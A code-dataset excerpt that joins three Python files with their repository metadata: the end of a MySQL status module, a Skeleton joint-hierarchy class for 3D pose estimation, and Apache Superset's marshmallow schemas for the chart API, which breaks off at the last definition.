mysqlstatus_res = [(x[0].lower(), typedvalue(x[1])) for x in mysqlstatus_res]
for res in mysqlstatus_res:
statuses[res[0]] = res[1]
module.exit_json(msg="Status found", status=statuses, changed=False)
if __name__ == '__main__':
main()
| 27.426829 | 141 | 0.631836 |
795bb62763fc4e6a8ab30085777d3b8c1105b88c | 2,555 | py | Python | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 235 | 2020-07-14T10:41:18.000Z | 2022-03-28T13:15:28.000Z | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 58 | 2020-07-14T23:39:55.000Z | 2022-03-24T12:48:13.000Z | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 52 | 2020-07-23T05:59:42.000Z | 2022-03-14T07:13:26.000Z | import numpy as np
class Skeleton:
def __init__(self, parents, joints_left, joints_right):
assert len(joints_left) == len(joints_right)
self._parents = parents
self._joints_left = joints_left
self._joints_right = joints_right
def num_joints(self):
return len(self._parents)
def parents(self):
return self._parents
def has_children(self):
return self._has_children
def children(self):
return self._children
def remove_joints(self, joints_to_remove):
"""
Remove the joints specified in 'joints_to_remove'.
"""
valid_joints = []
for joint in range(len(self._parents)):
if joint not in joints_to_remove:
valid_joints.append(joint)
for i in range(len(self._parents)):
while self._parents[i] in joints_to_remove:
self._parents[i] = self._parents[self._parents[i]]
index_offsets = np.zeros(len(self._parents), dtype=int)
new_parents = []
for i, parent in enumerate(self._parents):
if i not in joints_to_remove:
new_parents.append(parent - index_offsets[parent])
else:
index_offsets[i:] += 1
self._parents = np.array(new_parents)
if self._joints_left is not None:
new_joints_left = []
for joint in self._joints_left:
if joint in valid_joints:
new_joints_left.append(joint - index_offsets[joint])
self._joints_left = new_joints_left
if self._joints_right is not None:
new_joints_right = []
for joint in self._joints_right:
if joint in valid_joints:
new_joints_right.append(joint - index_offsets[joint])
self._joints_right = new_joints_right
self._compute_metadata()
return valid_joints
def joints_left(self):
return self._joints_left
def joints_right(self):
return self._joints_right
def _compute_metadata(self):
self._has_children = np.zeros(len(self._parents)).astype(bool)
for i, parent in enumerate(self._parents):
if parent != -1:
self._has_children[parent] = True
self._children = []
for parents in enumerate(self._parents):
self._children.append([])
for i, parent in enumerate(self._parents):
if parent != -1:
self._children[parent].append(i)
| 31.158537 | 73 | 0.599609 |
795bb63fe330e50d1e2d4a5685a42511e5e37cca | 43,418 | py | Python | superset/charts/schemas.py | jinnig/superset | c2e429039234cd74ce80e931a6df8400558fd4be | [
"Apache-2.0"
] | 1 | 2021-04-12T15:40:41.000Z | 2021-04-12T15:40:41.000Z | superset/charts/schemas.py | skhortiuk/superset | ac9c1372b42d8b64cf204faa88fe37a37bf0b06b | [
"Apache-2.0"
] | null | null | null | superset/charts/schemas.py | skhortiuk/superset | ac9c1372b42d8b64cf204faa88fe37a37bf0b06b | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict
from flask_babel import gettext as _
from marshmallow import EXCLUDE, fields, post_load, Schema, validate
from marshmallow.validate import Length, Range
from marshmallow_enum import EnumField
from superset import app
from superset.common.query_context import QueryContext
from superset.db_engine_specs.base import builtin_time_grains
from superset.utils import schema as utils
from superset.utils.core import (
AnnotationType,
ChartDataResultFormat,
ChartDataResultType,
FilterOperator,
PostProcessingBoxplotWhiskerType,
PostProcessingContributionOrientation,
TimeRangeEndpoint,
)
config = app.config
#
# RISON/JSON schemas for query parameters
#
get_delete_ids_schema = {"type": "array", "items": {"type": "integer"}}
width_height_schema = {
"type": "array",
"items": {"type": "integer"},
}
thumbnail_query_schema = {
"type": "object",
"properties": {"force": {"type": "boolean"}},
}
screenshot_query_schema = {
"type": "object",
"properties": {
"force": {"type": "boolean"},
"window_size": width_height_schema,
"thumb_size": width_height_schema,
},
}
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
get_fav_star_ids_schema = {"type": "array", "items": {"type": "integer"}}
#
# Column schema descriptions
#
slice_name_description = "The name of the chart."
description_description = "A description of the chart propose."
viz_type_description = "The type of chart visualization used."
owners_description = (
"Owner are users ids allowed to delete or change this chart. "
"If left empty you will be one of the owners of the chart."
)
params_description = (
"Parameters are generated dynamically when clicking the save "
"or overwrite button in the explore view. "
"This JSON object for power users who may want to alter specific parameters."
)
query_context_description = (
"The query context represents the queries that need to run "
"in order to generate the data the visualization, and in what "
"format the data should be returned."
)
cache_timeout_description = (
"Duration (in seconds) of the caching timeout "
"for this chart. Note this defaults to the datasource/table"
" timeout if undefined."
)
datasource_id_description = (
"The id of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_id` "
"and `datasource_type`."
)
datasource_uid_description = (
"The uid of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_uid` "
)
datasource_type_description = (
"The type of dataset/datasource identified on `datasource_id`."
)
datasource_name_description = "The datasource name."
dashboards_description = "A list of dashboards to include this new chart to."
changed_on_description = "The ISO date that the chart was last changed."
slice_url_description = "The URL of the chart."
form_data_description = (
"Form data from the Explore controls used to form the chart's data query."
)
description_markeddown_description = "Sanitized HTML version of the chart description."
owners_name_description = "Name of an owner of the chart."
#
# OpenAPI method specification overrides
#
openapi_spec_methods_override = {
"get": {"get": {"description": "Get a chart detail information."}},
"get_list": {
"get": {
"description": "Get a list of charts, use Rison or JSON query "
"parameters for filtering, sorting, pagination and "
" for selecting specific columns and metadata.",
}
},
"info": {
"get": {
"description": "Several metadata information about chart API endpoints.",
}
},
"related": {
"get": {
"description": "Get a list of all possible owners for a chart. "
"Use `owners` has the `column_name` parameter"
}
},
}
class ChartEntityResponseSchema(Schema):
"""
Schema for a chart object
"""
slice_id = fields.Integer()
slice_name = fields.String(description=slice_name_description)
cache_timeout = fields.Integer(description=cache_timeout_description)
changed_on = fields.String(description=changed_on_description)
modified = fields.String()
datasource = fields.String(description=datasource_name_description)
description = fields.String(description=description_description)
description_markeddown = fields.String(
description=description_markeddown_description
)
form_data = fields.Dict(description=form_data_description)
slice_url = fields.String(description=slice_url_description)
class ChartPostSchema(Schema):
"""
Schema to add a new chart.
"""
slice_name = fields.String(
description=slice_name_description, required=True, validate=Length(1, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(
description=params_description, allow_none=True, validate=utils.validate_json
)
query_context = fields.String(
description=query_context_description,
allow_none=True,
validate=utils.validate_json,
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(description=datasource_id_description, required=True)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
required=True,
)
datasource_name = fields.String(
description=datasource_name_description, allow_none=True
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartPutSchema(Schema):
"""
Schema to update or patch a chart
"""
slice_name = fields.String(
description=slice_name_description, allow_none=True, validate=Length(0, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
allow_none=True,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(description=params_description, allow_none=True)
query_context = fields.String(
description=query_context_description, allow_none=True
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(
description=datasource_id_description, allow_none=True
)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
allow_none=True,
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartGetDatasourceObjectDataResponseSchema(Schema):
datasource_id = fields.Integer(description="The datasource identifier")
datasource_type = fields.Integer(description="The datasource type")
class ChartGetDatasourceObjectResponseSchema(Schema):
label = fields.String(description="The name of the datasource")
value = fields.Nested(ChartGetDatasourceObjectDataResponseSchema)
class ChartGetDatasourceResponseSchema(Schema):
count = fields.Integer(description="The total number of datasources")
result = fields.Nested(ChartGetDatasourceObjectResponseSchema)
class ChartCacheScreenshotResponseSchema(Schema):
cache_key = fields.String(description="The cache key")
chart_url = fields.String(description="The url to render the chart")
image_url = fields.String(description="The url to fetch the screenshot")
class ChartDataColumnSchema(Schema):
column_name = fields.String(
description="The name of the target column", example="mycol",
)
type = fields.String(description="Type of target column", example="BIGINT")
class ChartDataAdhocMetricSchema(Schema):
"""
Ad-hoc metrics are used to define metrics outside the datasource.
"""
expressionType = fields.String(
description="Simple or SQL metric",
required=True,
validate=validate.OneOf(choices=("SIMPLE", "SQL")),
example="SQL",
)
aggregate = fields.String(
description="Aggregation operator. Only required for simple expression types.",
validate=validate.OneOf(
choices=("AVG", "COUNT", "COUNT_DISTINCT", "MAX", "MIN", "SUM")
),
)
column = fields.Nested(ChartDataColumnSchema)
sqlExpression = fields.String(
description="The metric as defined by a SQL aggregate expression. "
"Only required for SQL expression type.",
example="SUM(weight * observations) / SUM(weight)",
)
label = fields.String(
description="Label for the metric. Is automatically generated unless "
"hasCustomLabel is true, in which case label must be defined.",
example="Weighted observations",
)
hasCustomLabel = fields.Boolean(
description="When false, the label will be automatically generated based on "
"the aggregate expression. When true, a custom label has to be "
"specified.",
example=True,
)
optionName = fields.String(
description="Unique identifier. Can be any string value, as long as all "
"metrics have a unique identifier. If undefined, a random name "
"will be generated.",
example="metric_aec60732-fac0-4b17-b736-93f1a5c93e30",
)
class ChartDataAggregateConfigField(fields.Dict):
def __init__(self) -> None:
super().__init__(
description="The keys are the name of the aggregate column to be created, "
"and the values specify the details of how to apply the "
"aggregation. If an operator requires additional options, "
"these can be passed here to be unpacked in the operator call. The "
"following numpy operators are supported: average, argmin, argmax, cumsum, "
"cumprod, max, mean, median, nansum, nanmin, nanmax, nanmean, nanmedian, "
"min, percentile, prod, product, std, sum, var. Any options required by "
"the operator can be passed to the `options` object.\n"
"\n"
"In the example, a new column `first_quantile` is created based on values "
"in the column `my_col` using the `percentile` operator with "
"the `q=0.25` parameter.",
example={
"first_quantile": {
"operator": "percentile",
"column": "my_col",
"options": {"q": 0.25},
}
},
)
class ChartDataPostProcessingOperationOptionsSchema(Schema):
pass
class ChartDataAggregateOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Aggregate operation config.
"""
groupby = (
fields.List(
fields.String(
allow_none=False, description="Columns by which to group by",
),
minLength=1,
required=True,
),
)
aggregates = ChartDataAggregateConfigField()
class ChartDataRollingOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Rolling operation config.
"""
columns = (
fields.Dict(
description="columns on which to perform rolling, mapping source column to "
"target column. For instance, `{'y': 'y'}` will replace the "
"column `y` with the rolling value in `y`, while `{'y': 'y2'}` "
"will add a column `y2` based on rolling values calculated "
"from `y`, leaving the original column `y` unchanged.",
example={"weekly_rolling_sales": "sales"},
),
)
rolling_type = fields.String(
description="Type of rolling window. Any numpy function will work.",
validate=validate.OneOf(
choices=(
"average",
"argmin",
"argmax",
"cumsum",
"cumprod",
"max",
"mean",
"median",
"nansum",
"nanmin",
"nanmax",
"nanmean",
"nanmedian",
"nanpercentile",
"min",
"percentile",
"prod",
"product",
"std",
"sum",
"var",
)
),
required=True,
example="percentile",
)
window = fields.Integer(
description="Size of the rolling window in days.", required=True, example=7,
)
rolling_type_options = fields.Dict(
desctiption="Optional options to pass to rolling method. Needed for "
"e.g. quantile operation.",
example={},
)
center = fields.Boolean(
description="Should the label be at the center of the window. Default: `false`",
example=False,
)
win_type = fields.String(
description="Type of window function. See "
"[SciPy window functions](https://docs.scipy.org/doc/scipy/reference"
"/signal.windows.html#module-scipy.signal.windows) "
"for more details. Some window functions require passing "
"additional parameters to `rolling_type_options`. For instance, "
"to use `gaussian`, the parameter `std` needs to be provided.",
validate=validate.OneOf(
choices=(
"boxcar",
"triang",
"blackman",
"hamming",
"bartlett",
"parzen",
"bohman",
"blackmanharris",
"nuttall",
"barthann",
"kaiser",
"gaussian",
"general_gaussian",
"slepian",
"exponential",
)
),
)
min_periods = fields.Integer(
description="The minimum amount of periods required for a row to be included "
"in the result set.",
example=7,
)
class ChartDataSelectOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.List(
fields.String(),
description="Columns which to select from the input data, in the desired "
"order. If columns are renamed, the original column name should be "
"referenced here.",
example=["country", "gender", "age"],
)
exclude = fields.List(
fields.String(),
description="Columns to exclude from selection.",
example=["my_temp_column"],
)
rename = fields.List(
fields.Dict(),
description="columns which to rename, mapping source column to target column. "
"For instance, `{'y': 'y2'}` will rename the column `y` to `y2`.",
example=[{"age": "average_age"}],
)
class ChartDataSortOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.Dict(
description="columns by by which to sort. The key specifies the column name, "
"value specifies if sorting in ascending order.",
example={"country": True, "gender": False},
required=True,
)
aggregates = ChartDataAggregateConfigField()
class ChartDataContributionOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Contribution operation config.
"""
orientation = fields.String(
description="Should cell values be calculated across the row or column.",
required=True,
validate=validate.OneOf(
choices=[val.value for val in PostProcessingContributionOrientation]
),
example="row",
)
class ChartDataProphetOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Prophet operation config.
"""
time_grain = fields.String(
description="Time grain used to specify time period increments in prediction. "
"Supports [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) "
"durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
required=True,
)
periods = fields.Integer(
descrption="Time periods (in units of `time_grain`) to predict into the future",
min=1,
example=7,
required=True,
)
confidence_interval = fields.Float(
description="Width of predicted confidence interval",
validate=[
Range(
min=0,
max=1,
min_inclusive=False,
max_inclusive=False,
error=_("`confidence_interval` must be between 0 and 1 (exclusive)"),
)
],
example=0.8,
required=True,
)
yearly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should yearly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
weekly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should weekly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
monthly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should monthly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
class ChartDataBoxplotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Boxplot operation config.
"""
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
)
whisker_type = fields.String(
description="Whisker type. Any numpy function will work.",
validate=validate.OneOf(
choices=([val.value for val in PostProcessingBoxplotWhiskerType])
),
required=True,
example="tukey",
)
percentiles = fields.Tuple(
(
fields.Float(
description="Lower percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"lower percentile must be greater than 0 and less "
"than 100. Must be lower than upper percentile."
),
),
],
),
fields.Float(
description="Upper percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"upper percentile must be greater than 0 and less "
"than 100. Must be higher than lower percentile."
),
),
],
),
),
description="Upper and lower percentiles for percentile whisker type.",
example=[1, 99],
)
class ChartDataPivotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Pivot operation config.
"""
index = (
fields.List(
fields.String(
allow_none=False,
description="Columns to group by on the table index (=rows)",
),
minLength=1,
required=True,
),
)
columns = fields.List(
fields.String(
allow_none=False, description="Columns to group by on the table columns",
),
)
metric_fill_value = fields.Number(
description="Value to replace missing values with in aggregate calculations.",
)
column_fill_value = fields.String(
description="Value to replace missing pivot columns names with."
)
drop_missing_columns = fields.Boolean(
description="Do not include columns whose entries are all missing "
"(default: `true`).",
)
marginal_distributions = fields.Boolean(
description="Add totals for row/column. (default: `false`)",
)
marginal_distribution_name = fields.String(
description="Name of marginal distribution row/column. (default: `All`)",
)
aggregates = ChartDataAggregateConfigField()
class ChartDataGeohashDecodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash decode operation config.
"""
geohash = fields.String(
description="Name of source column containing geohash string", required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
class ChartDataGeohashEncodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash encode operation config.
"""
latitude = fields.String(
description="Name of source latitude column", required=True,
)
longitude = fields.String(
description="Name of source longitude column", required=True,
)
geohash = fields.String(
description="Name of target column for encoded geohash string", required=True,
)
class ChartDataGeodeticParseOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geodetic point string parsing operation config.
"""
geodetic = fields.String(
description="Name of source column containing geodetic point strings",
required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
altitude = fields.String(
description="Name of target column for decoded altitude. If omitted, "
"altitude information in geodetic string is ignored.",
)
class ChartDataPostProcessingOperationSchema(Schema):
operation = fields.String(
description="Post processing operation type",
required=True,
validate=validate.OneOf(
choices=(
"aggregate",
"boxplot",
"contribution",
"cum",
"geodetic_parse",
"geohash_decode",
"geohash_encode",
"pivot",
"prophet",
"rolling",
"select",
"sort",
"diff",
"compare",
)
),
example="aggregate",
)
options = fields.Dict(
description="Options specifying how to perform the operation. Please refer "
"to the respective post processing operation option schemas. "
"For example, `ChartDataPostProcessingOperationOptions` specifies "
"the required options for the pivot operation.",
example={
"groupby": ["country", "gender"],
"aggregates": {
"age_q1": {
"operator": "percentile",
"column": "age",
"options": {"q": 0.25},
},
"age_mean": {"operator": "mean", "column": "age",},
},
},
)
class ChartDataFilterSchema(Schema):
col = fields.String(
description="The column to filter.", required=True, example="country"
)
op = fields.String( # pylint: disable=invalid-name
description="The comparison operator.",
validate=utils.OneOfCaseInsensitive(
choices=[filter_op.value for filter_op in FilterOperator]
),
required=True,
example="IN",
)
val = fields.Raw(
description="The value or values to compare against. Can be a string, "
"integer, decimal or list, depending on the operator.",
example=["China", "France", "Japan"],
)
class ChartDataExtrasSchema(Schema):
time_range_endpoints = fields.List(EnumField(TimeRangeEndpoint, by_value=True))
relative_start = fields.String(
description="Start time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
relative_end = fields.String(
description="End time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator.",
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator.",
)
having_druid = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries.",
)
time_grain_sqla = fields.String(
description="To what level of granularity should the temporal column be "
"aggregated. Supports "
"[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
allow_none=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week.",
allow_none=True,
)
class AnnotationLayerSchema(Schema):
annotationType = fields.String(
description="Type of annotation layer",
validate=validate.OneOf(choices=[ann.value for ann in AnnotationType]),
)
color = fields.String(description="Layer color", allow_none=True,)
descriptionColumns = fields.List(
fields.String(),
description="Columns to use as the description. If none are provided, "
"all will be shown.",
)
hideLine = fields.Boolean(
description="Should line be hidden. Only applies to line annotations",
allow_none=True,
)
intervalEndColumn = fields.String(
description=(
"Column containing end of interval. Only applies to interval layers"
),
allow_none=True,
)
name = fields.String(description="Name of layer", required=True)
opacity = fields.String(
description="Opacity of layer",
validate=validate.OneOf(
choices=("", "opacityLow", "opacityMedium", "opacityHigh"),
),
allow_none=True,
required=False,
)
overrides = fields.Dict(
keys=fields.String(
desciption="Name of property to be overridden",
validate=validate.OneOf(
choices=("granularity", "time_grain_sqla", "time_range", "time_shift"),
),
),
values=fields.Raw(allow_none=True),
description="which properties should be overridable",
allow_none=True,
)
show = fields.Boolean(description="Should the layer be shown", required=True)
showMarkers = fields.Boolean(
description="Should markers be shown. Only applies to line annotations.",
required=True,
)
sourceType = fields.String(
description="Type of source for annotation data",
validate=validate.OneOf(choices=("", "line", "NATIVE", "table",)),
)
style = fields.String(
description="Line style. Only applies to time-series annotations",
validate=validate.OneOf(choices=("dashed", "dotted", "solid", "longDashed",)),
)
timeColumn = fields.String(
description="Column with event date or interval start date", allow_none=True,
)
titleColumn = fields.String(description="Column with title", allow_none=True,)
width = fields.Float(
description="Width of annotation line",
validate=[
Range(
min=0,
min_inclusive=True,
error=_("`width` must be greater or equal to 0"),
)
],
)
value = fields.Raw(
description="For formula annotations, this contains the formula. "
"For other types, this is the primary key of the source object.",
required=True,
)
class ChartDataDatasourceSchema(Schema):
description = "Chart datasource"
id = fields.Integer(description="Datasource id", required=True,)
type = fields.String(
description="Datasource type",
validate=validate.OneOf(choices=("druid", "table")),
)
class ChartDataQueryObjectSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
datasource = fields.Nested(ChartDataDatasourceSchema, allow_none=True)
result_type = EnumField(ChartDataResultType, by_value=True, allow_none=True)
annotation_layers = fields.List(
fields.Nested(AnnotationLayerSchema),
description="Annotation layers to apply to chart",
allow_none=True,
)
applied_time_extras = fields.Dict(
description="A mapping of temporal extras that have been applied to the query",
allow_none=True,
example={"__time_range": "1 year ago : now"},
)
apply_fetch_values_predicate = fields.Boolean(
description="Add fetch values predicate (where clause) to query "
"if defined in datasource",
allow_none=True,
)
filters = fields.List(fields.Nested(ChartDataFilterSchema), allow_none=True)
granularity = fields.String(
description="Name of temporal column used for time filtering. For legacy Druid "
"datasources this defines the time grain.",
allow_none=True,
)
granularity_sqla = fields.String(
description="Name of temporal column used for time filtering for SQL "
"datasources. This field is deprecated, use `granularity` "
"instead.",
allow_none=True,
deprecated=True,
)
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
post_processing = fields.List(
fields.Nested(ChartDataPostProcessingOperationSchema, allow_none=True),
allow_none=True,
description="Post processing operations to be applied to the result set. "
"Operations are applied to the result set in sequential order.",
)
time_range = fields.String(
description="A time rage, either expressed as a colon separated string "
"`since : until` or human readable freeform. Valid formats for "
"`since` and `until` are: \n"
"- ISO 8601\n"
"- X days/years/hours/day/year/weeks\n"
"- X days/years/hours/day/year/weeks ago\n"
"- X days/years/hours/day/year/weeks from now\n"
"\n"
"Additionally, the following freeform can be used:\n"
"\n"
"- Last day\n"
"- Last week\n"
"- Last month\n"
"- Last quarter\n"
"- Last year\n"
"- No filter\n"
"- Last X seconds/minutes/hours/days/weeks/months/years\n"
"- Next X seconds/minutes/hours/days/weeks/months/years\n",
example="Last week",
allow_none=True,
)
time_shift = fields.String(
description="A human-readable date/time string. "
"Please refer to [parsdatetime](https://github.com/bear/parsedatetime) "
"documentation for details on valid values.",
allow_none=True,
)
is_timeseries = fields.Boolean(
description="Is the `query_object` a timeseries.", allow_none=True,
)
timeseries_limit = fields.Integer(
description="Maximum row count for timeseries queries. Default: `0`",
allow_none=True,
)
timeseries_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by.", allow_none=True,
)
row_limit = fields.Integer(
description='Maximum row count (0=disabled). Default: `config["ROW_LIMIT"]`',
allow_none=True,
validate=[
Range(min=0, error=_("`row_limit` must be greater than or equal to 0"))
],
)
row_offset = fields.Integer(
description="Number of rows to skip. Default: `0`",
allow_none=True,
validate=[
Range(min=0, error=_("`row_offset` must be greater than or equal to 0"))
],
)
order_desc = fields.Boolean(
description="Reverse order. Default: `false`", allow_none=True,
)
extras = fields.Nested(
ChartDataExtrasSchema,
description="Extra parameters to add to the query.",
allow_none=True,
)
columns = fields.List(
fields.String(),
description="Columns which to select in the query.",
allow_none=True,
)
orderby = fields.List(
fields.Tuple(
(
fields.Raw(
validate=[
Length(min=1, error=_("orderby column must be populated"))
],
allow_none=False,
),
fields.Boolean(),
)
),
description="Expects a list of lists where the first element is the column "
"name which to sort by, and the second element is a boolean.",
allow_none=True,
example=[("my_col_1", False), ("my_col_2", True)],
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator."
"This field is deprecated and should be passed to `extras`.",
allow_none=True,
deprecated=True,
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator. This field is deprecated and should be passed "
"to `extras`.",
allow_none=True,
deprecated=True,
)
having_filters = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries. "
"This field is deprecated and should be passed to `extras` "
"as `having_druid`.",
allow_none=True,
deprecated=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week. "
"This field is deprecated and should be passed to `extras` "
"as `druid_time_origin`.",
allow_none=True,
)
url_params = fields.Dict(
description="Optional query parameters passed to a dashboard or Explore view",
keys=fields.String(description="The query parameter"),
values=fields.String(description="The value of the query parameter"),
allow_none=True,
)
is_rowcount = fields.Boolean(
description="Should the rowcount of the actual query be returned",
allow_none=True,
)
time_offsets = fields.List(fields.String(), allow_none=True,)
class ChartDataQueryContextSchema(Schema):
datasource = fields.Nested(ChartDataDatasourceSchema)
queries = fields.List(fields.Nested(ChartDataQueryObjectSchema))
force = fields.Boolean(
description="Should the queries be forced to load from the source. "
"Default: `false`",
)
result_type = EnumField(ChartDataResultType, by_value=True)
result_format = EnumField(ChartDataResultFormat, by_value=True)
# pylint: disable=no-self-use,unused-argument
@post_load
def make_query_context(self, data: Dict[str, Any], **kwargs: Any) -> QueryContext:
query_context = QueryContext(**data)
return query_context
# pylint: enable=no-self-use,unused-argument
class AnnotationDataSchema(Schema):
columns = fields.List(
fields.String(),
description="columns available in the annotation result",
required=True,
)
records = fields.List(
fields.Dict(keys=fields.String(),),
description="records mapping the column name to it's value",
required=True,
)
class ChartDataResponseResult(Schema):
annotation_data = fields.List(
fields.Dict(
keys=fields.String(description="Annotation layer name"),
values=fields.String(),
),
description="All requested annotation data",
allow_none=True,
)
cache_key = fields.String(
description="Unique cache key for query object", required=True, allow_none=True,
)
cached_dttm = fields.String(
description="Cache timestamp", required=True, allow_none=True,
)
cache_timeout = fields.Integer(
description="Cache timeout in following order: custom timeout, datasource "
"timeout, default config timeout.",
required=True,
allow_none=True,
)
error = fields.String(description="Error", allow_none=True,)
is_cached = fields.Boolean(
description="Is the result cached", required=True, allow_none=None,
)
query = fields.String(
description="The executed query statement", required=True, allow_none=False,
)
status = fields.String(
description="Status of the query",
validate=validate.OneOf(
choices=(
"stopped",
"failed",
"pending",
"running",
"scheduled",
"success",
"timed_out",
)
),
allow_none=False,
)
stacktrace = fields.String(
desciption="Stacktrace if there was an error", allow_none=True,
)
rowcount = fields.Integer(
description="Amount of rows in result set", allow_none=False,
)
data = fields.List(fields.Dict(), description="A list with results")
applied_filters = fields.List(
fields.Dict(), description="A list with applied filters"
)
rejected_filters = fields.List(
fields.Dict(), description="A list with rejected filters"
)
class ChartDataResponseSchema(Schema):
result = fields.List(
fields.Nested(ChartDataResponseResult),
description="A list of results for each corresponding query in the request.",
)
class ChartDataAsyncResponseSchema(Schema):
channel_id = fields.String(
description="Unique session async channel ID", allow_none=False,
)
job_id = fields.String(description="Unique async job ID", allow_none=False,)
user_id = fields.String(description="Requesting user ID", allow_none=True,)
status = fields.String(description="Status value for async job", allow_none=False,)
result_url = fields.String(
description="Unique result URL for fetching async query data", allow_none=False,
)
class ChartFavStarResponseResult(Schema):
id = fields.Integer(description="The Chart id")
value = fields.Boolean(description="The FaveStar value")
class GetFavStarIdsSchema(Schema):
result = fields.List(
fields.Nested(ChartFavStarResponseResult),
description="A list of results for each corresponding chart in the request",
)
class ImportV1ChartSchema(Schema):
slice_name = fields.String(required=True)
viz_type = fields.String(required=True)
params = fields.Dict()
query_context = fields.Dict()
cache_timeout = fields.Integer(allow_none=True)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
dataset_uuid = fields.UUID(required=True)
CHART_SCHEMAS = (
